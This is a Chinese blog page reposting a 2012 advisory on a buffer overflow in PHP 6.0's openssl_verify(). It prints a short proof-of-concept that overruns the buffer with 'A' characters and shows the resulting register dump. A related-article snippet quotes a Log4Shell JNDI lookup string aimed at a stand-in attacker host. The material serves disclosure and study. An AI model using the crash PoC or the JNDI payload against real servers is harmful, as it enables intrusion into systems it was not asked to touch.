php verify,PHP 'openssl_verify()'缓冲区溢出漏洞

最新推荐文章于 2025-01-15 11:23:36 发布
最新推荐文章于 2025-01-15 11:23:36 发布
阅读量165 收藏
点赞数
文章标签: php verify
这篇博客揭示了2012年PHP 6.0版本中的一个缓冲区溢出漏洞,指出该漏洞允许远程攻击者执行任意代码,提供了openssl_verify函数的本地溢出PoC,并强调了厂商已发布补丁修复这一问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

发布日期:2012-07-23

更新日期:2012-07-24

受影响系统:

PHP PHP 6.0

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 54622

PHP 是一种 HTML 内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。

PHP 6.0在实现中存在缓冲区溢出漏洞,成功利用此漏洞可允许远程攻击者在受影响的Web服务器中执行任意代码。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

vendor ()提供了如下测试方法:

// ==================================================================================

//

// PHP 6.0 openssl_verify() Local Buffer Overflow PoC

//

// Tested on WIN XP, Apache, PHP 6.0dev. Local Buffer Overflow.

//

// Local Buffer Overflow

// Author: Pr0T3cT10n

//

// ==================================================================================

//

// REGISTERS:

// EAX 000003D0, ECX 00BBDB28, EDX 00BBDAD8

// EBX 00BBC940, ESP 0012FB5C UNICODE "AAA...."

// ESI 00BBC940, EDI 00831D00, EBP 0012FBF0 UNICODE "AAA...."

// EIP 00410041

//

// ==================================================================================

$buffer = str_repeat("A", 1000);

openssl_verify(1,1,$buffer);

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

李继农
关注
12、漏洞利用编写与内存问题深度解析
delta的博客
08-01 6
本文深入解析了网络安全领域中漏洞利用编写的关键技术,包括服务器套接字的创建、栈溢出与堆溢出漏洞的利用原理、整数运算错误导致的漏洞以及实际案例分析。文章通过代码示例和流程图详细阐述了各类漏洞的利用方式及防范措施,旨在帮助读者提高系统安全防护能力。
CVE-2014-6321 schannel堆溢出漏洞分析
weixin_34375054的博客
03-08 1925
cssembly · 2014/12/05 12:090x00 背景MS14-066 (CVE-2014-6321) 是存在于Microsoft的schannel.dll中的TLS堆缓冲区溢出漏洞。下面对原理以及poc构造进行分析。0x01 SSL/TLS原理介绍Https是一种基于SSL/TLS的Http,所有的http数据都是在SSL/TLS协议封装之上传输的。研究Https协议原理,最终其实...
php中openssl verify,PHP: openssl_verify - Manual
weixin_27127993的博客
04-05 160
Anbybody trying to get a Win32 CryptoAPI based digital signature component to work with the openssl_verify() function should be aware that the CryptoAPI PKCS1 (RSA) method uses bytes in reverse order ...
php openssl_verify,openssl_verify的用法!?
weixin_35615475的博客
03-17 800
openssl_verify openssl_verify的用法是什么?我想知道他的三个参数分别传递什么值!回复讨论(解决方案)$pub_key_id 毫无悬疑是公钥!其他两个参数$data 和 $signature分别表示什么意思?$signature公钥加密生成的数据,$data原始数据$fp = fopen("pem公钥", "r");$cert = fread($fp, 8192);f...
PHP OPENSSL 函数手册翻译备查 -- openssl_verify
雷锋精神
05-13 2713
openssl_verify (PHP 4 >= 4.0.4, PHP 5) openssl_verify — 验证签名 说明 int openssl_verify ( string $data , string $signature , mixed $pub_key_id [, mixed $signature_alg = OPENSSL_ALGO_SHA1 ]
php openssl_verify,php使用openssl_verify验证签名实例程序
weixin_39572409的博客
03-17 511
/*** 验证签名* TobeVerified 待验证签名的密文* PlainText 待验证签名的明文* CertFile 签名者公钥证书* return 验证成功返回true,失败返回false(从LastErrMsg属性获取失败原因)*/function VerifyMsg($TobeVerified, $PlainText, $CertFile,$signature_alg=OPEN...
php verify,php 使用openssl_verify验证签名实例程序
weixin_35457696的博客
03-11 528
/*** 验证签名* TobeVerified 待验证签名的密文* PlainText 待验证签名的明文* CertFile 签名者公钥证书* return 验证成功返回true,失败返回false(从LastErrMsg属性获取失败原因)*/function VerifyMsg($TobeVerified, $PlainText, $CertFile,$signature_alg=OPENSSL...
Rsa.rar_RSA openssl_openssl rsa_openssl rsa c_rsa
09-19
同时,为了提高安全性,应使用安全的编程习惯,如防止缓冲区溢出。 总的来说,这个压缩包提供了一个使用C++和OpenSSL实现RSA算法的例子,对于学习和理解RSA及OpenSSL的使用具有很高的参考价值。如果你需要深入学习...
el7升级openssh和openssl修复漏洞
流金岁月的专栏
08-08 969
openssl openssh
【紧急更新】OpenSSL 3.3.2安全漏洞修复:关键改进深度剖析
![【紧急更新】OpenSSL 3.3.2...本文首先概述了OpenSSL 3.3.2版本中的一个特定安全漏洞,随后回顾了OpenSSL的基础理论,并分析了安全漏洞的种类及影响。接着,本文深入探讨了漏洞的具体细节,包括发现过程、技术分析
php openssl_verify,PHP中使用OpenSSL下openssl_verify验证签名案例详解
weixin_42501033的博客
03-17 791
$json = '{"sign":"myYCvJqsDJUNX67qJnklrVY025oSQmm4D4bIVdHZQzihV+G8G848MmAAatAxCDuCmJbenI0jRZk7p22HjFT0nRykEeSmTExiT+Jx7\/2GQn5grEA3qd7i9gCPz\/E7+n9mleukLuJoXeceVp626c4gLZTKiPPcmbsJIfwfNexCBZXb2B7Omcgv...
PHP verify 验证码
qq_39612654的博客
03-15 349
<?php session_start(); //图片认证 define('CAPTCHA_NUMCHARS', 5); define('CAPTCHA_WIDTH', 100); define('CAPTCHA_HEIGHT', 20); //设置随机字符 $pass_phrase = ""; for ($i=0; $i < CAPTCHA_NUMCHARS; $i++) { $pass_phrase .= chr(rand(97,122));//将数字转为asc码 } //...
php openssl_verify校验失败 算法RSA 签名算法SHA256WithRSA
weixin_45143733的博客
01-15 680
OPENSSL_ALGO_SHA256 php openssl_verify校验失败 算法RSA 签名算法SHA25:“\/”输出为这个字符,实际为“/”;还有“+”变为空格了。
47.90.18.87 user.php,verify.php
weixin_28695537的博客
03-22 499
/*!* ATTENTION: THIS FREE LICENSE IS ONLY FOR PERSONAL NON-COMMERCIAL USER. FOR COMMERCIAL PURPOSES, PLEASE PURCHASE A COMMERCIAL LICENSE! ** module: Centcount Analytics Verify Page PHP Code ** versio...
php password_verify 函数
ljh574649119的专栏
02-23 1094
说明: 由于使用 md5_crypt() 、crypt() 或者 password_hash() 函数(PHP 5.5+)生成的哈希密文是随机并且每一次都不相同的,所以你无法使用 md5_crypt('12345') == md5_crypt('12345') 的方式来判断哈希值与字符串相等,而需要使用 password_verify() 来判断它们是否相等。相等返回 true,否则返回 false。$password 原始密码。作用:验证一个密码是否与哈希密钥相等。
php openssl_verify,PHP中使用OpenSSL下openssl_verify验证签名案例
weixin_36354131的博客
03-17 496
$json = '{"sign":"myYCvJqsDJUNX67qJnklrVY025oSQmm4D4bIVdHZQzihV+G8G848MmAAatAxCDuCmJbenI0jRZk7p22HjFT0nRykEeSmTExiT+Jx7\/2GQn5grEA3qd7i9gCPz\/E7+n9mleukLuJoXeceVp626c4gLZTKiPPcmbsJIfwfNexCBZXb2B7Omcgv...
缓冲区溢出漏洞浅析
manok的专栏
10-01 2694
缓冲区是指内存中一段连续的地址空间,用来缓存数据。在大多数开发语言中,把数组和指针分配的空间作为缓冲区缓冲区溢出是指读取或写入的范围超过数组或指针指向的缓冲区空间,导致程序运行期间发生异常。缓冲区溢出大多数情况下编译器无法给出错误信息,而只有当程序运行期间才会暴露出来,所以缓冲区溢出也归属于运行时缺陷。运行期间发生异常是由于缓冲区溢出数据(包括上界和下界),破坏了缓冲区上下边界外其它变...
php 使用pem密匙,php – openssl_verify():提供的密钥参数不能强制转换为.pem文件的公钥...
weixin_29421255的博客
04-02 448
目前正在尝试读取.pem公钥以通过openssl进行验证./*** Check whether the signed message sent back by the server is* correct or not.*/function check($str, $MAC){$fp = fopen(dirname(__FILE__) . '/rsa_public_key.pem','r');$c...
帮我写POC自动爆破系统漏洞的脚本
最新发布
06-19
分析漏洞机理(如缓冲区溢出、SQL注入逻辑),明确触发条件和影响范围。参考CVE文档和厂商公告,例如: ```python # 示例:研究CVE-2021-44228 (Log4Shell)原理 # 漏洞触发点:${jndi:ldap://attacker....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值